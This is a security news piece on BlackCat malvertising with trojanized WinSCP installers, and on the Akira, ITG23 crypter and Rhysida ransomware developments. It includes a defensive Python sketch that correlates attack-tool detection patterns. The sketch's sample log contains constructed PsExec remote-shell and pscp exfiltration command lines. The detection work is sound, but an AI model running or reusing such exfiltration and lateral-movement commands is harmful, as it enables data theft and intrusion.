Threat actors associated with the BlackCat ransomware have been observed using malvertising tricks to distribute rogue installers of the WinSCP file transfer application.
“Bad actors use malvertising to distribute malware through cloned web pages from legitimate organizations,” Trend Micro researchers said in an analysis published last week. “In this case, the distribution involves a web page of the well-known application WinSCP, an open source Windows application for file transfer.”
Malvertising refers to the use of SEO poisoning techniques to spread malware through online advertising. This usually involves hijacking a chosen set of keywords to display bogus ads on Bing and Google search results pages, with the goal of redirecting unsuspecting users to sketchy pages.
The idea is to trick users looking for applications like WinSCP into downloading malware, in this case a backdoor that contains a Cobalt Strike Beacon, which connects to a remote server for follow-on operations, while also using legitimate tools such as AdFind to facilitate network discovery.
The access provided by Cobalt Strike is then abused to download a number of programs for reconnaissance, enumeration (PowerView), lateral movement (PsExec), bypassing antivirus software (KillAV BAT), and exfiltrating customer data (PuTTY Secure Copy client). Also observed is the use of Terminator, a defense evasion tool that tampers with security software via a Bring Your Own Vulnerable Driver (BYOVD) attack.
In the chain of attacks detailed by the cybersecurity firm, the threat actor managed to obtain top-level administrator privileges to perform post-exploitation activities and attempted to establish persistence using remote monitoring and management tools such as AnyDesk, as well as access backup servers.
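The post-compromise chain described above is exactly the kind of sequence a detection engineer would correlate rather than alert on tool by tool. The following Python sketch is an added illustration, not code from the Trend Micro report: it classifies constructed process-creation events against the tooling named here (AdFind, PowerView, PsExec, the KillAV batch file, Terminator, AnyDesk, PuTTY Secure Copy) and flags a host only when several distinct stages land inside one time window. The log format, regex patterns, sample events, window and threshold are all assumptions made for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Chain stages keyed to the tooling the report names; patterns are constructed here, not report IoCs.
STAGES = {
    "discovery":        r"\badfind(\.exe)?\b",
    "enumeration":      r"powerview|\bget-net(user|group|computer)\b",
    "lateral_movement": r"\bpsexe(c|svc)(\.exe)?\b",
    "defense_evasion":  r"killav|\bterminator\b",
    "persistence":      r"\banydesk(\.exe)?\b",
    "exfiltration":     r"\bpscp(\.exe)?\b",
}
# Constructed process-creation log format: one event per line.
EVENT_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) image=(?P<image>\S+) cmdline="(?P<cmd>[^"]*)"$')

def classify(image, cmd):
    """Return the set of chain stages matched by an image path or command line."""
    text = f"{image} {cmd}"
    return {s for s, p in STAGES.items() if re.search(p, text, re.I)}

def correlate(lines, window=timedelta(hours=2), min_stages=3):
    """Flag hosts where >= min_stages distinct stages occur inside one window: a lone
    PsExec or AnyDesk launch is routine admin work, a clustered chain is not."""
    hits = defaultdict(list)                    # host -> [(timestamp, stage)]
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue                            # skip malformed lines instead of aborting
        ev = m.groupdict()
        for stage in classify(ev["image"], ev["cmd"]):
            hits[ev["host"]].append((datetime.fromisoformat(ev["ts"]), stage))
    flagged = {}
    for host, events in hits.items():
        events.sort()
        for i, (start, _) in enumerate(events):  # slide the window over sorted events
            stages = {s for t, s in events[i:] if t - start <= window}
            if len(stages) >= min_stages:
                flagged[host] = sorted(stages)
                break
    return flagged

# Constructed sample: WS01 shows four stages within 90 minutes; WS07 shows only one.
SAMPLE_LOG = """\
2023-07-10T09:02:11 host=WS01 image=C:\\Temp\\AdFind.exe cmdline="AdFind.exe -f objectcategory=computer"
2023-07-10T09:05:40 host=WS01 image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c C:\\Temp\\KillAV.bat"
2023-07-10T09:41:07 host=WS01 image=C:\\Temp\\PsExec.exe cmdline="PsExec.exe \\\\SRV02 -s cmd.exe"
2023-07-10T10:30:00 host=WS01 image=C:\\Temp\\pscp.exe cmdline="pscp.exe -r D:\\share user@203.0.113.5:/out"
2023-07-10T11:15:22 host=WS07 image=C:\\Users\\admin\\Downloads\\AnyDesk.exe cmdline="AnyDesk.exe --install"
"""
```

Running `correlate(SAMPLE_LOG.splitlines())` flags WS01 with four stages and leaves WS07 alone, which is the behaviour you want from a rule that should not page on every remote-support install.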
“It is very likely that the enterprise would be substantially affected by the attack if it intervened later, especially since the threat actor has managed to gain early access to domain administrator privileges and started building backdoors and persistence,” said Trend Micro.
This development is just the latest example of threat actors leveraging the Google Ads platform to spread malware. In November 2022, Microsoft disclosed an attack campaign that leveraged an advertising service to deploy BATLOADER, which was then used to drop Royal ransomware.
It also comes as Czech cybersecurity company Avast released a free decryptor for the fledgling Akira ransomware to help victims recover their data without having to pay the attackers. Akira, which first emerged in March 2023, has since expanded its targeting to include Linux systems.
“Akira has some similarities to the Conti v2 ransomware, which may indicate that the malware authors were at least inspired by the leaked Conti source,” an Avast researcher said. The company did not disclose how it cracked the ransomware’s encryption algorithm.
The Conti/TrickBot syndicate, aka Gold Ulrick or ITG23, shut down in May 2022 after a series of disruptive events triggered by the start of Russia’s invasion of Ukraine. But the e-crime groups continue to exist today, albeit as smaller entities that use crypters and shared infrastructure to distribute their wares.
IBM Security X-Force, in a recent deep dive, said the gang’s crypters, which are applications designed to encrypt and obfuscate malware to evade detection by antivirus scanners and hinder analysis, are also being used to spread new malware families such as Aresloader, Canyon, CargoBay, DICELOADER, Lumma C2, Matanbuchus, Minodo (formerly Domino), Pikabot, SVCReady, and Vidar.
“Previously, crypters were used primarily with core malware families related to ITG23 and their close partners,” security researchers Charlotte Hammond and Ole Villadsen said. “However, the cracking of ITG23 and the emergence of new factions, relationships and methods, have impacted the way crypters are used.”
Despite the dynamic nature of the cybercrime ecosystem, as cybercriminals come and go, and multiple operations partner together, shut down, or rebrand their financially motivated schemes, ransomware continues to be a constant threat.
This includes the emergence of a new ransomware-as-a-service (RaaS) group called Rhysida, which primarily targets the education, government, manufacturing, and technology sectors across Western Europe, North and South America, and Australia.
“Rhysida is a 64-bit Windows Portable Executable (PE) cryptographic ransomware application compiled using MINGW/GCC,” SentinelOne said in a technical write-up. “In each sample analyzed, the application program name was set to Rhysida-0.1, indicating that the tool is in an early stage of development.”